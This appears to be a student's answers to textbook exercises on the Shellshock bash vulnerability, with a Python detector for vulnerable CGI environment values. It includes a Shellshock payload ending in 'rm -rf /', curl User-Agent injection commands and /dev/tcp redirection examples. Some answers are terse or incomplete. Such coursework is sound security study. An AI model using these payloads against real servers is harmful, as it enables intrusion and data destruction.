Shellshock_ex

3.1. When a shell variable containing a shell function definition is passed down to a child process as an environment variable, what is going to happen to the function definition?

Before the vulnerability was fixed, the variable would not exist in the child process; instead there would be a function whose name is the variable's name and whose body is the variable's value.
After the fix, the child shell has the same variable as the parent shell.

3.2. Assume a Bash program defines a shell function, exports it, and then starts a child process that also runs Bash. Please explain how this function defined in the parent Bash becomes a function in the child Bash.

When the parent shell creates a process, it passes every exported function as an environment variable. When the child process runs bash (or the child is itself bash), it parses those environment variables and converts them back into functions. This works because the child process receives a copy of the parent's environment variables.

3.3. Write a Bash function definition that tries to exploit the Shellshock vulnerability.

seed@ubuntu:~$ export foo='() { echo Hello World; }; rm -rf /'

seed@ubuntu:~$ bash

3.4. Instead of putting an extra shell command after a function definition, we put it at the beginning (see the following example). We then run Bash, which is vulnerable to the Shellshock attack. Will the shell command echo world be executed?

$ export foo='echo world; () { echo hello;}'
$ bash

No. The vulnerability only exists when the variable's value begins with "() {". Otherwise the value is treated as a regular string, and foo is available as an ordinary variable in the child process.

3.5. For the Shellshock vulnerability to be exploitable, two conditions need to be satisfied. What are these two conditions?

1. The target process must run bash.
2. The process must receive some environment variables from outside, for example from an untrusted user.

3.6. How do user inputs get into a remote a CGI program (written in Bash) in the form of environment variables?

A web server such as Apache passes client header information (for example the User-Agent) as environment variables to the CGI programs it invokes. So by setting the User-Agent field by hand, we can make sure that an environment variable exists on the remote machine whose value is chosen by us.

3.7. Instead of using a function definition in the Shellshock attack against CGI programs, can we directly put shell commands inside the User-Agent field, so when Bash is triggered, the shell command can be executed?

No. The bash vulnerability exists because bash looks for the string "() {" at the beginning of an environment variable's value; if it matches, bash treats the value as a function and continues parsing it. If the value does not look like a function definition, bash treats it as a plain string and does not run the commands.

3.8. Why was this mistake made? And what lesson did you learn from this mistake?

p47: the flawed parsing code in parse_and_execute() is what caused the security vulnerability.

3.9. There is another way to send inputs to a CGI program. That is to attach the input in the URL. See the following example.

http://www.example.com/myprog.cgi?name=value

Can we put our malicious function definition in the value field of the above URL, so when this value gets into the CGI program myprog.cgi, the Shellshock vulnerability can be exploited?

There is no way to affect the environment variables this way.
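As an added example (not part of the original exercise answers), the following Python checker applies the rule from 3.4 and 3.7, that an unpatched bash only parses a value as a function when it begins with "() {", to a constructed CGI environment of the kind described in 3.6 and 3.9 (the variable names follow the usual CGI convention; the header values are made up for the test).

```python
import re
from typing import Dict, List, Optional, Tuple

# Unpatched bash only treats an imported variable as a function definition
# when its value starts with "() {" (problems 3.4 and 3.7).
FUNC_PREFIX = re.compile(r"^\(\)\s*\{")


def trailing_commands(value: str) -> Optional[str]:
    """Return the command text an unpatched bash would execute after the
    function body in `value`, "" if nothing follows the body, or None if
    `value` is not parsed as a function definition at all."""
    if not FUNC_PREFIX.match(value):
        return None            # ordinary string: bash just creates a variable
    depth = 0
    for i, ch in enumerate(value):
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:     # closing brace of the function body
                return value[i + 1:].strip("; \t")
    return None                # no complete body found; nothing to flag


def scan_cgi_env(env: Dict[str, str]) -> List[Tuple[str, str]]:
    """List (variable, trailing commands) for every environment entry that
    would make an unpatched bash run extra commands on startup."""
    findings = []
    for name, value in env.items():
        rest = trailing_commands(value)
        if rest:
            findings.append((name, rest))
    return findings


# Constructed sample of what Apache hands a CGI program: request headers
# become HTTP_* variables (HTTP_USER_AGENT carries the curl -A value from
# 3.14) and URL parameters as in 3.9 arrive through QUERY_STRING.
SAMPLE_ENV = {
    "REQUEST_METHOD": "GET",
    "HTTP_USER_AGENT": "() { echo hello; }; echo world;",  # 3.14 payload
    "HTTP_ACCEPT": "echo world; () { echo hello;}",         # 3.4 layout
    "HTTP_REFERER": "echo world",                           # 3.7: plain command
    "QUERY_STRING": "name=() { echo hello; }; echo world",  # 3.9: starts with name=
}

if __name__ == "__main__":
    for var, cmds in scan_cgi_env(SAMPLE_ENV):
        print(f"{var}: bash would also run {cmds!r}")
```

Only HTTP_USER_AGENT is reported; the other three values never reach the function parser, which matches the answers given above.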

3.10. We run "nc -l 7070" on Machine 1 (IP address is 10.0.2.6), and we then type the following command on Machine 2. Describe what is going to happen?

$ /bin/cat < /dev/tcp/10.0.2.6/7070 >&0

nc -l 7070 listens for incoming connections on port 7070, so Machine 1 will display on its screen whatever Machine 2 types.

3.11. Please describe how you would do the following: run the /bin/cat program on Machine 1; the program takes its input from Machine 2, and print out its output to Machine 3.

Machine2:
$ nc -l 7070

Machine3:
$ nc -l 7070

Machine 1:
$ /bin/cat < /dev/tcp/Machine2/7070 > /dev/tcp/Machine3/7070

3.12. Consider the following program:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
extern char **environ;      /* the parent's environment, unused here */
int main(void)
{
    char *args[] =
    {
        "/bin/sh", "-c",
        "/bin/ls", NULL
    };
    pid_t pid = fork();
    if(pid == 0) {
        /* child: run /bin/ls via /bin/sh with an empty environment */
        printf("child\n");
        execve(args[0], &args[0], NULL); ①
    }
    else if(pid > 0) {
        /* parent */
        printf("parent\n");
    }
    return 0;
}

The program forks a child process, and executes the /bin/ls program using /bin/sh, which is a symbolic link to /bin/bash. The program is executed as the following. Explain what the output of the program will be and why.

$ gcc prog.c -o prog
$ export foo='() { echo hello; }; echo world;'
$ ./prog

execve is not given the parent process's environment variables, so "world" is not printed.

3.13. Let's make a change to the code in Problem 3.12. We change the code in Line ① to the following. Please redo Problem 3.12 with this change made.

execve(args[0], &args[0], environ);

The foo environment variable is now passed to the child.

3.14. Consider a PHP program running as Apache module, and a CGI program.

-----------------------------------
The PHP program (test.php):
<?php
system("/bin/ls -l");
?>
-----------------------------------
The CGI program (test.cgi):
#!/bin/sh
/bin/ls -l

Both programs invoke /bin/ls command in a new shell process (/bin/sh points to /bin/bash). If the programs are invoked as the following, please explain the difference in effect of the Shellshock vulnerability on these two cases. What conditions are necessary to exploit shellshock in either case?

$ curl -A "() { echo hello; }; echo world;" http://localhost/test.php
$ curl -A "() { echo hello; }; echo world;" http://localhost/test.cgi

p57: the Shellshock vulnerability requires two conditions to be met:

  1. bash is invoked
  2. user data is passed in as an environment variable

But in the PHP script these are not always satisfied: if CGI is not used, Apache cannot pass data to the PHP program through environment variables.
